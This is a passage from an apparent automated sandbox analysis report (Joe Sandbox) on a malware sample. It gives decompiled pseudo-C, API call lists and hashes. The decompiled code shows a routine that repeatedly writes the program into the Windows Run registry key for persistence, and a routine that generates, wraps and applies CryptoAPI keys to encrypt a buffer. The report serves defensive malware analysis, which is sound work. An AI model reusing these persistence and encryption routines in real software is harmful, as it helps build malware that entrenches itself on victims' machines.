                                                                                                                                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                                                                                                                                        				void* _v32;
                                                                                                                                                                                                                                                                                                        				char _v36;
                                                                                                                                                                                                                                                                                                        				char _v40;
                                                                                                                                                                                                                                                                                                        				char _v44;
                                                                                                                                                                                                                                                                                                        				char _v48;
                                                                                                                                                                                                                                                                                                        				char _v52;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _v56;
                                                                                                                                                                                                                                                                                                        				long _v60;
                                                                                                                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                                                                                                                                        				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                                                        					L17:
                                                                                                                                                                                                                                                                                                        					return _v8;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v16 = _t79;
                                                                                                                                                                                                                                                                                                        					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        					_v12 = _t80;
                                                                                                                                                                                                                                                                                                        					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                                                        						_v24 = 0x1000;
                                                                                                                                                                                                                                                                                                        						_v20 = 0x1000;
                                                                                                                                                                                                                                                                                                        						_t85 = E024E8800(_v16,  &_v24, _v12,  &_v20, 0x24f3378, 0x94); // executed
                                                                                                                                                                                                                                                                                                        						if(_t85 != 0) {
                                                                                                                                                                                                                                                                                                        							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                                                        							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                                                        							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                                                        							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                                                        								_v40 = E024E8770(_t170, 0xa);
                                                                                                                                                                                                                                                                                                        								_v36 = E024E87D0(0xffffffff);
                                                                                                                                                                                                                                                                                                        								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                                                        								_v32 = _t90;
                                                                                                                                                                                                                                                                                                        								if(_v32 != 0) {
                                                                                                                                                                                                                                                                                                        									_v44 = _a8;
                                                                                                                                                                                                                                                                                                        									E024E7B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                                                        									_t94 = E024E8970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                                                        									if(_t94 != 0) {
                                                                                                                                                                                                                                                                                                        										_v48 = _a12;
                                                                                                                                                                                                                                                                                                        										E024E85D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                                                        										E024E85D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                                                        										_v60 = 0;
                                                                                                                                                                                                                                                                                                        										_v56 = _v48;
                                                                                                                                                                                                                                                                                                        										E024E85D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                                                        										_v52 = _v48;
                                                                                                                                                                                                                                                                                                        										E024E85D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                                                        										E024E85D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                                                        										E024E8650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                                                        										E024E85D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                                                        										 *_v56 = E024E16F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                                                        										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v16 != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                                        						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L17;
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                                                                        0x024e8376
                                                                                                                                                                                                                                                                                                        0x024e8381
                                                                                                                                                                                                                                                                                                        0x024e85c0
                                                                                                                                                                                                                                                                                                        0x024e85c6
                                                                                                                                                                                                                                                                                                        0x024e83b1
                                                                                                                                                                                                                                                                                                        0x024e83bf
                                                                                                                                                                                                                                                                                                        0x024e83c5
                                                                                                                                                                                                                                                                                                        0x024e83d6
                                                                                                                                                                                                                                                                                                        0x024e83dc
                                                                                                                                                                                                                                                                                                        0x024e83e3
                                                                                                                                                                                                                                                                                                        0x024e83f3
                                                                                                                                                                                                                                                                                                        0x024e83fa
                                                                                                                                                                                                                                                                                                        0x024e841b
                                                                                                                                                                                                                                                                                                        0x024e8425
                                                                                                                                                                                                                                                                                                        0x024e8431
                                                                                                                                                                                                                                                                                                        0x024e8435
                                                                                                                                                                                                                                                                                                        0x024e843b
                                                                                                                                                                                                                                                                                                        0x024e843e
                                                                                                                                                                                                                                                                                                        0x024e844e
                                                                                                                                                                                                                                                                                                        0x024e845b
                                                                                                                                                                                                                                                                                                        0x024e846b
                                                                                                                                                                                                                                                                                                        0x024e8471
                                                                                                                                                                                                                                                                                                        0x024e8478
                                                                                                                                                                                                                                                                                                        0x024e8481
                                                                                                                                                                                                                                                                                                        0x024e8490
                                                                                                                                                                                                                                                                                                        0x024e84a8
                                                                                                                                                                                                                                                                                                        0x024e84b2
                                                                                                                                                                                                                                                                                                        0x024e84bb
                                                                                                                                                                                                                                                                                                        0x024e84c8
                                                                                                                                                                                                                                                                                                        0x024e84da
                                                                                                                                                                                                                                                                                                        0x024e84e2
                                                                                                                                                                                                                                                                                                        0x024e84ec
                                                                                                                                                                                                                                                                                                        0x024e84f9
                                                                                                                                                                                                                                                                                                        0x024e8504
                                                                                                                                                                                                                                                                                                        0x024e8511
                                                                                                                                                                                                                                                                                                        0x024e8525
                                                                                                                                                                                                                                                                                                        0x024e853c
                                                                                                                                                                                                                                                                                                        0x024e8550
                                                                                                                                                                                                                                                                                                        0x024e8576
                                                                                                                                                                                                                                                                                                        0x024e857e
                                                                                                                                                                                                                                                                                                        0x024e857e
                                                                                                                                                                                                                                                                                                        0x024e858c
                                                                                                                                                                                                                                                                                                        0x024e858c
                                                                                                                                                                                                                                                                                                        0x024e8478
                                                                                                                                                                                                                                                                                                        0x024e843e
                                                                                                                                                                                                                                                                                                        0x024e8425
                                                                                                                                                                                                                                                                                                        0x024e8596
                                                                                                                                                                                                                                                                                                        0x024e85a3
                                                                                                                                                                                                                                                                                                        0x024e85a3
                                                                                                                                                                                                                                                                                                        0x024e85ad
                                                                                                                                                                                                                                                                                                        0x024e85ba
                                                                                                                                                                                                                                                                                                        0x024e85ba
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x024e85ad

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 024E83BF
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 024E83D6
                                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 024E846B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 024E89BF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: GetLastError.KERNEL32 ref: 024E89C9
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E89F8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 024E8A1F
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 024E8A41
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: CryptDestroyKey.ADVAPI32(00000000), ref: 024E8A4E
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 024E8A5A
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E858C
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E85A3
                                                                                                                                                                                                                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 024E85BA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,024E8420,00000000,00001000,00000000), ref: 024E883B
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: GetLastError.KERNEL32 ref: 024E8845
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptAcquireContextA.ADVAPI32(00000000,024EC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 024E8874
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 024E88AF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 024E88CF
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 024E890C
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 024E892A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E8800: CryptDestroyKey.ADVAPI32(?), ref: 024E8937
                                                                                                                                                                                                                                                                                                          • Part of subcall function 024E87D0: QueryPerformanceCounter.KERNEL32(?), ref: 024E87E7
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 487564122-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: bd92bde5b14c6db3531a412ad1d71847bc9a56bb6da1ab003835ba6c2674e24e
                                                                                                                                                                                                                                                                                                        • Instruction ID: f6ffeca49ac53ca09de961c284440be98f9fe3026100d0bde27379b2993f1a1c
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bd92bde5b14c6db3531a412ad1d71847bc9a56bb6da1ab003835ba6c2674e24e
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FB715EB5D00208ABEF04DFA4DC85FEFB7B6AB48305F14851AFA15A7290EB709644CF61
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                        			E024E12D0(CHAR* _a4) {
                                                                                                                                                                                                                                                                                                        				CHAR* _v8;
                                                                                                                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                                                                                                                        				CHAR* _v16;
                                                                                                                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_v8 = _a4;
                                                                                                                                                                                                                                                                                                        				if(_v8 != 0) {
                                                                                                                                                                                                                                                                                                        					_v16 = _v8;
                                                                                                                                                                                                                                                                                                        					_v12 = "software\\microsoft\\windows\\currentversion\\run";
                                                                                                                                                                                                                                                                                                        					while( *0x24f4370 == 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0x80000001;
                                                                                                                                                                                                                                                                                                        						if(( *(_v8 + 0x30c) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                                                        							_v20 = 0x80000002;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_v24 = 0;
                                                                                                                                                                                                                                                                                                        						_t26 = RegOpenKeyExA(_v20, _v12, 0, 0xf003f,  &_v24); // executed
                                                                                                                                                                                                                                                                                                        						if(_t26 == 0) {
                                                                                                                                                                                                                                                                                                        							_v28 = lstrlenA(_v16);
                                                                                                                                                                                                                                                                                                        							RegSetValueExA(_v24, _v8 + 0x208, 0, 1, _v16, _v28); // executed
                                                                                                                                                                                                                                                                                                        							RegCloseKey(_v24); // executed
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						Sleep(0x1388); // executed
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                                                                                                                        			}










                                                                                                                                                                                                                                                                                                        0x024e12d9
                                                                                                                                                                                                                                                                                                        0x024e12e0
                                                                                                                                                                                                                                                                                                        0x024e12e9
                                                                                                                                                                                                                                                                                                        0x024e12ec
                                                                                                                                                                                                                                                                                                        0x024e12f3
                                                                                                                                                                                                                                                                                                        0x024e1301
                                                                                                                                                                                                                                                                                                        0x024e1314
                                                                                                                                                                                                                                                                                                        0x024e1316
                                                                                                                                                                                                                                                                                                        0x024e1316
                                                                                                                                                                                                                                                                                                        0x024e131d
                                                                                                                                                                                                                                                                                                        0x024e1337
                                                                                                                                                                                                                                                                                                        0x024e133f
                                                                                                                                                                                                                                                                                                        0x024e134b
                                                                                                                                                                                                                                                                                                        0x024e1368
                                                                                                                                                                                                                                                                                                        0x024e1372
                                                                                                                                                                                                                                                                                                        0x024e1372
                                                                                                                                                                                                                                                                                                        0x024e137d
                                                                                                                                                                                                                                                                                                        0x024e137d
                                                                                                                                                                                                                                                                                                        0x024e12fc
                                                                                                                                                                                                                                                                                                        0x024e138d

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,024EC248,00000000,000F003F,00000000), ref: 024E1337
                                                                                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 024E1345
                                                                                                                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(00000000,-00000208,00000000,00000001,?,?), ref: 024E1368
                                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 024E1372
                                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001388), ref: 024E137D
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.642876389.00000000024E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.642718154.00000000024E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643378615.00000000024EC000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.643609709.00000000024EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_24e0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseOpenSleepValuelstrlen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3411147897-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: ae38cfd0c12f981cd17525641b6b03b81e111234a789442061b4ebe663f7dd22
                                                                                                                                                                                                                                                                                                        • Instruction ID: ad0b714d4794116f7ed524f26da8e4266f3456065a6c1e0a7a40e8a97b8df0d4
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae38cfd0c12f981cd17525641b6b03b81e111234a789442061b4ebe663f7dd22
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70210070E40209EBEF04CFE4D949BAFB7B4BB44701F104559E605AB681D7B49E51CF91
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ProtectVirtualmemcpy
                                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                                        • API String ID: 4237922067-2766056989
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6571a1a19d4867cb41af07d93aa71d0a9a5c92769b2966b0a7b26dbabfc254cc
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8db564d9ec81a64df9146292d569b296ad7d3bff1fbc65882943e8c813c52fae
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A015EB5A05205AFDB10EFA9D58459EFBF1EF88354F50882AF998E7350D334A8448B46
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 100021F9
                                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(0000007E), ref: 1000223B
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.669403930.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_10001000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: ErrorHugeLastRead
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3239643929-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                                                        • Instruction ID: c08fe1bd30c15a7bb6e8476d185febfb1ca0f6f7539b963f039c2b10503cc3e6
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 85b49708b7b006b8dd60775e5bc00b257713ffe4475079b25aab955e2dacc848
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB818574A00209EFDB04CF94C890B9EBBB5FF88354F248198E959AB355D774EE81CB90
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 52%
                                                                                                                                                                                                                                                                                                        			E00412210() {
                                                                                                                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                                                                                                                                        				signed int _v52;
                                                                                                                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                                                                                                                        				void* __ebp;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t24;
                                                                                                                                                                                                                                                                                                        				intOrPtr _t25;
                                                                                                                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                                                                                                                        				char* _t31;
                                                                                                                                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                                                                                                                        				intOrPtr* _t47;
                                                                                                                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                                                                                                                        				void* _t50;
                                                                                                                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                                                                                                                        				signed int _t52;
                                                                                                                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                                                                                                                                        				void* _t55;
                                                                                                                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                                                                                                                        				void* _t61;
                                                                                                                                                                                                                                                                                                        				char** _t62;
                                                                                                                                                                                                                                                                                                        				signed int* _t65;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t62 = _t61 - 0x10;
                                                                                                                                                                                                                                                                                                        				_t24 = E004102F0(_t46, _t49, _t50, _t54, _t55);
                                                                                                                                                                                                                                                                                                        				_t47 = _t24;
                                                                                                                                                                                                                                                                                                        				if(_t24 == 0 || ( *(_t24 + 0x20) & 0x0000000c) != 0) {
                                                                                                                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                                                                                                                        					return _t24;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					_t25 =  *0x422438; // 0xa52790
                                                                                                                                                                                                                                                                                                        					if(_t25 == 0) {
                                                                                                                                                                                                                                                                                                        						_v20 = 0;
                                                                                                                                                                                                                                                                                                        						_v24 = 4;
                                                                                                                                                                                                                                                                                                        						 *_t62 = "_pthread_cancelling_shmem"; // executed
                                                                                                                                                                                                                                                                                                        						_t24 = E00414330(__eflags); // executed
                                                                                                                                                                                                                                                                                                        						 *0x422438 = _t24;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					if( *_t24 != 0) {
                                                                                                                                                                                                                                                                                                        						_t5 = _t47 + 0x1c; // 0x1c
                                                                                                                                                                                                                                                                                                        						_t57 = _t5;
                                                                                                                                                                                                                                                                                                        						 *_t62 = _t57;
                                                                                                                                                                                                                                                                                                        						E00413FD0();
                                                                                                                                                                                                                                                                                                        						_t27 =  *(_t47 + 0x20) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						__eflags = _t27 & 0x00000003;
                                                                                                                                                                                                                                                                                                        						if((_t27 & 0x00000003) == 0) {
                                                                                                                                                                                                                                                                                                        							L8:
                                                                                                                                                                                                                                                                                                        							 *_t62 = _t57;
                                                                                                                                                                                                                                                                                                        							return E00413A00(_t49);
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t51 =  *(_t47 + 0x24);
                                                                                                                                                                                                                                                                                                        							__eflags = _t51 & 0x00000001;
                                                                                                                                                                                                                                                                                                        							if((_t51 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                                                                        								goto L8;
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t49 =  *(_t47 + 0x10);
                                                                                                                                                                                                                                                                                                        								__eflags =  *(_t47 + 0x10);
                                                                                                                                                                                                                                                                                                        								if( *(_t47 + 0x10) <= 0) {
                                                                                                                                                                                                                                                                                                        									_t52 = _t51 & 0xfffffffe;
                                                                                                                                                                                                                                                                                                        									 *(_t47 + 0x20) = _t27 & 0xfffffff3 | 0x00000004;
                                                                                                                                                                                                                                                                                                        									_t31 =  *(_t47 + 0x18);
                                                                                                                                                                                                                                                                                                        									 *(_t47 + 0x24) = _t52;
                                                                                                                                                                                                                                                                                                        									__eflags = _t31;
                                                                                                                                                                                                                                                                                                        									if(_t31 != 0) {
                                                                                                                                                                                                                                                                                                        										 *_t62 = _t31;
                                                                                                                                                                                                                                                                                                        										ResetEvent(??);
                                                                                                                                                                                                                                                                                                        										_push(_t47);
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									 *_t62 = _t57;
                                                                                                                                                                                                                                                                                                        									E00413A00(_t49);
                                                                                                                                                                                                                                                                                                        									E00412120();
                                                                                                                                                                                                                                                                                                        									_push(_t57);
                                                                                                                                                                                                                                                                                                        									_push(_t47);
                                                                                                                                                                                                                                                                                                        									_t65 = _t62 - 0x10;
                                                                                                                                                                                                                                                                                                        									_t33 = _v24;
                                                                                                                                                                                                                                                                                                        									__eflags = _t33;
                                                                                                                                                                                                                                                                                                        									if(_t33 == 0) {
                                                                                                                                                                                                                                                                                                        										E004102F0(_t47, _t49, _t52, _t54, _t57);
                                                                                                                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										 *_t65 = _t33;
                                                                                                                                                                                                                                                                                                        										_t38 = E00415BD0();
                                                                                                                                                                                                                                                                                                        										__eflags = _t52;
                                                                                                                                                                                                                                                                                                        										if(_t52 <= 0) {
                                                                                                                                                                                                                                                                                                        											__eflags = _t38 - 0xfffffffe;
                                                                                                                                                                                                                                                                                                        											if(_t38 > 0xfffffffe) {
                                                                                                                                                                                                                                                                                                        												goto L15;
                                                                                                                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                                                                                                                        												_t48 = _t38;
                                                                                                                                                                                                                                                                                                        												_t44 = E004102F0(_t48, _t49, _t52, _t54, _t57);
                                                                                                                                                                                                                                                                                                        												__eflags = _t48;
                                                                                                                                                                                                                                                                                                        												_t58 = _t44;
                                                                                                                                                                                                                                                                                                        												if(_t48 != 0) {
                                                                                                                                                                                                                                                                                                        													goto L16;
                                                                                                                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                                                                                                                        													L21:
                                                                                                                                                                                                                                                                                                        													E00412210();
                                                                                                                                                                                                                                                                                                        													 *_t65 = 0;
                                                                                                                                                                                                                                                                                                        													Sleep(??);
                                                                                                                                                                                                                                                                                                        													E00412210();
                                                                                                                                                                                                                                                                                                        													__eflags = 0;
                                                                                                                                                                                                                                                                                                        													return 0;
                                                                                                                                                                                                                                                                                                        												}
                                                                                                                                                                                                                                                                                                        											}
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											L15:
                                                                                                                                                                                                                                                                                                        											_t39 = E004102F0(_t47, _t49, _t52, _t54, _t57);
                                                                                                                                                                                                                                                                                                        											_t48 = 0xffffffff;
                                                                                                                                                                                                                                                                                                        											_t58 = _t39;
                                                                                                                                                                                                                                                                                                        											L16:
                                                                                                                                                                                                                                                                                                        											E00412210();
